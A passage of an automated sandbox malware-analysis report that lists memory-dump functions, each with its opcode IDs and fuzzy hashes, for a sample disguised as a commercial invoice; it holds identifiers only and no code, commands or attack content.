                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de613e1b123471d18fa184742ef5fd118b380b0dcd82db5556d215128c6a2c18
                                              • Instruction ID: 259341bb82e2661359e42e83a5c1edd8d629558eb9395aabe10d8932d74cc466
                                              • Opcode Fuzzy Hash: de613e1b123471d18fa184742ef5fd118b380b0dcd82db5556d215128c6a2c18
                                              • Instruction Fuzzy Hash: 8D31F53060F6469FD786AB3884922B4B7E1FF453307D901F9C10ACB596DA6D6C628791
                                              Function 00007FF7C1831643 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bb0320332431c4181ed4c21074b459017d5505640eecb885d99309c66300f49
                                              • Instruction ID: bdadd60f9c531836b30259ca269dc273ac9bebcb0025ebdc0b0ec90b45b0db30
                                              • Opcode Fuzzy Hash: 7bb0320332431c4181ed4c21074b459017d5505640eecb885d99309c66300f49
                                              • Instruction Fuzzy Hash: 0431396050F78A9FD741AB7848222B8FBE1BF06360B8941F9C149CB1D3DE6D2C15C791
                                              Function 00007FF7C1848B10 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d3932b30e30d174d00c56bc3079b22402c7ea8e679eec30b9b6f010b112088f
                                              • Instruction ID: 65a4f34e04d6cd0aa445ecdc22d647c0b0299c6358a5cd91295fbee4c527afd9
                                              • Opcode Fuzzy Hash: 1d3932b30e30d174d00c56bc3079b22402c7ea8e679eec30b9b6f010b112088f
                                              • Instruction Fuzzy Hash: 9521A16071CD098FDBA8AA5D5454776F3D1FF59334B8005BAD00EC3691CE65A8228790
                                              Function 00007FF7C18323D0 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cff8fe4cca08f13ca588c5bb475019a79cb05e68171196ae8a7e2dccf52840e5
                                              • Instruction ID: 74d769781dead35477e20d8046cc2c8348ccbebac64737119f621b014d30847b
                                              • Opcode Fuzzy Hash: cff8fe4cca08f13ca588c5bb475019a79cb05e68171196ae8a7e2dccf52840e5
                                              • Instruction Fuzzy Hash: 3121AF70A0C90A8FD798FA18D494AA6F3E1FF98325F94477AD44DC3245DE39E9528780
                                              Function 00007FF7C183776D Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2f7ddc86a55ba387680f9c3c17617da705e41c0cc1aea0433733c897a426a8e
                                              • Instruction ID: 1a8d65b04ab5b2ef934746b6ce054976be095060123870bab5634e79df392aea
                                              • Opcode Fuzzy Hash: b2f7ddc86a55ba387680f9c3c17617da705e41c0cc1aea0433733c897a426a8e
                                              • Instruction Fuzzy Hash: 1D215E71B28D0A8FDB5CEB2980546B5F3E2FFA9315754476E800BC3696DE35E5068780
                                              Function 00007FF7C1839C79 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61d9226807ce1242a80886d479f70ff40d023a859e079631a7638d17c712e893
                                              • Instruction ID: 8443cbb7ca7b3f5056bff45e9ccc61bd14e431a9e61d3954ec008a49e3bdd171
                                              • Opcode Fuzzy Hash: 61d9226807ce1242a80886d479f70ff40d023a859e079631a7638d17c712e893
                                              • Instruction Fuzzy Hash: 6321D82140E7C65FD747A77448216A5BFF1AF83220B8D41FAD089CB193DE1CA926C361
                                              Function 00007FF7C183A941 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 694e092b28087978a6d648c616826654595d103df2943701b272aa37087657bd
                                              • Instruction ID: a4ef04b8df4f2b89a12a2cc9d6465e80dd403ad36ac663acad39af3c88623bb3
                                              • Opcode Fuzzy Hash: 694e092b28087978a6d648c616826654595d103df2943701b272aa37087657bd
                                              • Instruction Fuzzy Hash: F2119D22E2DD1A4BAB2CBA1CA4511B9B3D2EF5833179442BAD41EC3287DD68B85642C5
                                              Function 00007FF7C19415B0 Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb643423d092b8b622b736234e371ca7ecdf501706d75ec09fdaa2e6009d7c94
                                              • Instruction ID: 5f1ac04c7e6238b2db7689c4db267d9a7df2061d6864585300f7e3c846ebab07
                                              • Opcode Fuzzy Hash: eb643423d092b8b622b736234e371ca7ecdf501706d75ec09fdaa2e6009d7c94
                                              • Instruction Fuzzy Hash: 5F21033150898D8FDB49EF28C8545B9B7E1FFA9348B5546BAD00BC7195CE31F841C780
                                              Function 00007FF7C18379B0 Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f496ce2197cf3d2e687033d036847b4099a268f2c25a2bbe4f2f6e345a03877
                                              • Instruction ID: bd5a691fbea941b0685ec60e23da3c0d710431df253835dec63387410818c356
                                              • Opcode Fuzzy Hash: 7f496ce2197cf3d2e687033d036847b4099a268f2c25a2bbe4f2f6e345a03877
                                              • Instruction Fuzzy Hash: FF21E720A1DD4A4FD799FB2C84556A5B7E1FFD6360BD802B9D04DC7286DE6CE8228350
                                              Function 00007FF7C183A882 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 66997e7997f2518a1698cbf713b48489c2c6caa70edf6cc6d2148b7c1f05dcf9
                                              • Instruction ID: 388462816bf79580fd3e76ff9534a1ecf72aef308b6a4379c2bd13b26e63f48a
                                              • Opcode Fuzzy Hash: 66997e7997f2518a1698cbf713b48489c2c6caa70edf6cc6d2148b7c1f05dcf9
                                              • Instruction Fuzzy Hash: 6211CE21A1DE4A4BD758AB2868551A9B3D1EF8873039402BEC44EC3287DE68B8568685
                                              Function 00007FF7C1839288 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4812b20162c3db9ff6965395070bf79a7bdda084d4cc7991f0805a31d2d7565f
                                              • Instruction ID: 3f8d4609cdafc647a0e39059c1edb7cd2ed91a42ee6a3945147c236c37abee7a
                                              • Opcode Fuzzy Hash: 4812b20162c3db9ff6965395070bf79a7bdda084d4cc7991f0805a31d2d7565f
                                              • Instruction Fuzzy Hash: EA11A33104E7C99FC7169F748825594BFF0FE47320B4981EED0988B093E758652EC752
                                              Function 00007FF7C185E460 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baa9f4230321d6727750a1f7b80059c47b6695290c7ea4e75ff322ef29a19fcb
                                              • Instruction ID: eda18c84feea3c137aff7719de878c59cd987e6e2ee0a3742893033b65deca75
                                              • Opcode Fuzzy Hash: baa9f4230321d6727750a1f7b80059c47b6695290c7ea4e75ff322ef29a19fcb
                                              • Instruction Fuzzy Hash: A4012D3170D7858FD75AAB2C68551B07BD1EF9B23035401FBD049CB1A7DD596C178361
                                              Function 00007FF7C183AAD2 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c65456629026e3123746b43f9e138c69177bca9be2e7014e9885bc545e6f02f
                                              • Instruction ID: 9b44b0ff7bfe69d4ad77ebd34adcf9c2f91bf090bd54b43043879751f1456239
                                              • Opcode Fuzzy Hash: 5c65456629026e3123746b43f9e138c69177bca9be2e7014e9885bc545e6f02f
                                              • Instruction Fuzzy Hash: 4001CC21B1CD1A0B9B6DBA1CA0811B9F3C2EF8873079446BED41FC338ADD68B8524285
                                              Function 00007FF7C18390A7 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93aa787128c80c895e314022939f38fa7b3b0238023a8b69085a0c6bdbd21ca2
                                              • Instruction ID: 882adc6b427e71abd48221cee0aa2d0cea6d1a7852ff3efb6d4b0927352b3c6a
                                              • Opcode Fuzzy Hash: 93aa787128c80c895e314022939f38fa7b3b0238023a8b69085a0c6bdbd21ca2
                                              • Instruction Fuzzy Hash: F611D02061DA8A9FD704AB288451765F3E1FF59314F9443B9C00A87693CE38B8128780
                                              Function 00007FF7C183A9AA Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eeaefd192dd226e49d6ba115a3c08b27ae86133d5a28a5f5c6e2abacfa066124
                                              • Instruction ID: 64364015299dfff75d1a0b571094d6025ad52117a1874de58d0c8b7be54e5977
                                              • Opcode Fuzzy Hash: eeaefd192dd226e49d6ba115a3c08b27ae86133d5a28a5f5c6e2abacfa066124
                                              • Instruction Fuzzy Hash: 7D01DE21B1CD1A0BA76CBA1CA4401B9F3C2EF4873079446BEC40EC328ACD68B8424285
                                              Function 00007FF7C18369F8 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d06bd95437c274dda14cc4f2f1f77d3a2feb2124f29fa2e23de1bb605a31667
                                              • Instruction ID: 7a2616255fd1c213ce755e65f2542d3a27693bf25c58d01eeb15a0f04d753c9e
                                              • Opcode Fuzzy Hash: 4d06bd95437c274dda14cc4f2f1f77d3a2feb2124f29fa2e23de1bb605a31667
                                              • Instruction Fuzzy Hash: 3E11A030A1DD4B5FD759EB2984506A5B3E2FF94360B948679D00EC2285CE38F8568790
                                              Function 00007FF7C18323F3 Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 384fc2275cca471a355f2f0486c0769fdd6cdfd699fa9545d26edf4fab4a97ca
                                              • Instruction ID: f353b6712b9dbdb39e1daa955e081178669f3a7a7396fd14d882ff1d3a434e9d
                                              • Opcode Fuzzy Hash: 384fc2275cca471a355f2f0486c0769fdd6cdfd699fa9545d26edf4fab4a97ca
                                              • Instruction Fuzzy Hash: 87012421A1DE5B0BE771BA5D78A02B7F7D1EF46370FC40636E80CC2182DC98E84582B1
                                              Function 00007FF7C183AAAF Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55f1f59acc1b65354da43f1eaeee41a8c59a3e1c086caf3ab6d5b7447320d6c1
                                              • Instruction ID: 06eba59fbfb52092036e982aa188623bca76491ede79435ddd34ade9f46e1195
                                              • Opcode Fuzzy Hash: 55f1f59acc1b65354da43f1eaeee41a8c59a3e1c086caf3ab6d5b7447320d6c1
                                              • Instruction Fuzzy Hash: D001DF21B1DD5A0B9B6CBB1CA4411B9F3D2EF4833079846BFD40EC328BCD6CB8128285
                                              Function 00007FF7C18323F0 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1006b2f81b63145bfe85f0adff16d4ab9c0b111a2858eeabdb028526a489d60
                                              • Instruction ID: d5fb2502c6ccc299ce9fd0fc4bb5e15f457446d42119c6c6a8d566ebd707b704
                                              • Opcode Fuzzy Hash: b1006b2f81b63145bfe85f0adff16d4ab9c0b111a2858eeabdb028526a489d60
                                              • Instruction Fuzzy Hash: 0301F12191DE5B0BE771BA6D38A02B7B7D1EF46370FC40636E80CC2282DC98F84182B1
                                              Function 00007FF7C1843250 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e575bf4bf9cbe676df6a08195690f001cf3ac713efbdb98f9c9b5e056113d3d
                                              • Instruction ID: 771d346568fbba645e684db8eafdbf15a887f345dc579fabee8f0b91d7612f96
                                              • Opcode Fuzzy Hash: 0e575bf4bf9cbe676df6a08195690f001cf3ac713efbdb98f9c9b5e056113d3d
                                              • Instruction Fuzzy Hash: 8801003160CB148FCB45EB28C004AAAB7E1FF89320F448A7AE449D7260CE74E884C7C2
                                              Function 00007FF7C18369F0 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7d46117c83bc245a81af068361cbef9170490d6e98e2ae07b6287d354fb9325
                                              • Instruction ID: e540f145260eb769f9b353f3f5b913b7cc103b6f61fcb7f64da2eaeb7c81cb2d
                                              • Opcode Fuzzy Hash: f7d46117c83bc245a81af068361cbef9170490d6e98e2ae07b6287d354fb9325
                                              • Instruction Fuzzy Hash: 9301D121B2CD164BA76CB72968895B6B2D0FFA8365750447EF41FC36C7DD24B8068784
                                              Function 00007FF7C183AA8C Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 516c92affb27d9a6e712e4e2bc208a2b67e7e297801cc69d6e4988cd9d659cc8
                                              • Instruction ID: 86a66e48415a766ccc2b36fe18263589eb74284f72a152ff67fbd11acc22abbd
                                              • Opcode Fuzzy Hash: 516c92affb27d9a6e712e4e2bc208a2b67e7e297801cc69d6e4988cd9d659cc8
                                              • Instruction Fuzzy Hash: 0B01DF21B1D95A0B972CBA1CA4411BAF3C1EF4833079446BFD05FC328BCD68B8538285
                                              Function 00007FF7C183A8D8 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fbf779faf1544cbb9eb12cfab73c3f9438ad2fb64c71228fa339406806c2dad
                                              • Instruction ID: 0f54f5429118b59ceb52f7822a483eee10249ae36a318ca8eb8ff6214b54cf25
                                              • Opcode Fuzzy Hash: 0fbf779faf1544cbb9eb12cfab73c3f9438ad2fb64c71228fa339406806c2dad
                                              • Instruction Fuzzy Hash: 04018F21A1DD560B976CBB1CA4411B9F3D1EF4833079446BED45EC328BCD68B8528285
                                              Function 00007FF7C183AAF5 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1075277306dc97ad891fd4ca77863f2e2de9c6f69ab8e1d716576ba6af551606
                                              • Instruction ID: f187e801aaee5227e4ea8a11dac0b339032d24097aa1152289828002741436e0
                                              • Opcode Fuzzy Hash: 1075277306dc97ad891fd4ca77863f2e2de9c6f69ab8e1d716576ba6af551606
                                              • Instruction Fuzzy Hash: 0E014B21B1CD1A4B966CBA1CA4511A9B3D1EF8873079446BED44EC328ADD68B9524289
                                              Function 00007FF7C183A9CD Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9eba1ff73ca604f8a47f696880a62a73c8968751d2dde3a458f5085968476dd
                                              • Instruction ID: 4413fb75783220a6c9697f1a2c62401629d4c48b56f6978d83a1b0b18d000f05
                                              • Opcode Fuzzy Hash: c9eba1ff73ca604f8a47f696880a62a73c8968751d2dde3a458f5085968476dd
                                              • Instruction Fuzzy Hash: A0014F21B1CD1A4B966CBA1CA4411B9B3D1EF8873079446BEE44EC328BDD68B8524285
                                              Function 00007FF7C183A8FB Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 113462d2bbd35fca72a61edaf54923a3b041fe7c868f50a86e10e9df9b7d97fb
                                              • Instruction ID: df7f5d2c1161aa4a50c8edc347c9b52e4db83cac5d46e15ee9042b1de4cdf060
                                              • Opcode Fuzzy Hash: 113462d2bbd35fca72a61edaf54923a3b041fe7c868f50a86e10e9df9b7d97fb
                                              • Instruction Fuzzy Hash: 72018B21A1D95A0B976CBA1CA4411B9F3D1EF8833079846BED45EC338BCD6CB8528285
                                              Function 00007FF7C183AB1D Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1261f03c09f1b81cfde6f5ecf5d2cfe0782984db37baab844046c8737d60d396
                                              • Instruction ID: 645f304e9ff7a61511beb689c3b982d3f31d3f7a5d3d9815e496c439e60a295a
                                              • Opcode Fuzzy Hash: 1261f03c09f1b81cfde6f5ecf5d2cfe0782984db37baab844046c8737d60d396
                                              • Instruction Fuzzy Hash: 89016D21B1CD1A0B966DBB1CB4411B9F3D1EF8873079446BED45EC328BDD69B85342C9
                                              Function 00007FF7C183A9F8 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51d6652714db449a29dae4eef3430347ed6b7fd78c08a26c17d0c8104f82d667
                                              • Instruction ID: bf01351cd39e4a68b90b3b34b7f4eb78efa313a22fad67d5499ac63023f286c1
                                              • Opcode Fuzzy Hash: 51d6652714db449a29dae4eef3430347ed6b7fd78c08a26c17d0c8104f82d667
                                              • Instruction Fuzzy Hash: BC016221B1CD1A4B9A6CBF1CA4411A9B3D1EF8873079442BED44EC32CBDD68B9564685
                                              Function 00007FF7C18307B0 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78604b0d428093cdfc16fb5d37395a22eacd4dbd724cebb5c5ceda0faf543b91
                                              • Instruction ID: a697e186a0a850741650fda969ccfe531ab15b37de7033bd4bd9df910030aa37
                                              • Opcode Fuzzy Hash: 78604b0d428093cdfc16fb5d37395a22eacd4dbd724cebb5c5ceda0faf543b91
                                              • Instruction Fuzzy Hash: 6C01F96460CB161BE728591E945977BB6C5EF89771F8D013EE88EC31C2DE68EC5092A0
                                              Function 00007FF7C1837A85 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf5db2635d4dfe05260f72e0b5a95fcfcff0d48c0169acbd4a136c921e4a8dcd
                                              • Instruction ID: e5a738bcc745f0c56b67b4de22e885e96d9c9d94e5dbabaa10f0f0110c19d448
                                              • Opcode Fuzzy Hash: cf5db2635d4dfe05260f72e0b5a95fcfcff0d48c0169acbd4a136c921e4a8dcd
                                              • Instruction Fuzzy Hash: 25017311B4D95A07DB58F77C78546F9A791EF85331B88437AE508C61C7CD48B88283D0
                                              Function 00007FF7C185B1C0 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
                                              • Instruction ID: 6a16a0bcbc2f921898372e0fdfd66e1d65b0af78cadb4bc2fd4c0d8c2fcf229c
                                              • Opcode Fuzzy Hash: 5608c72137a7e274b7a42fc685b73e050ae1c87573e192978f3f397378f055cc
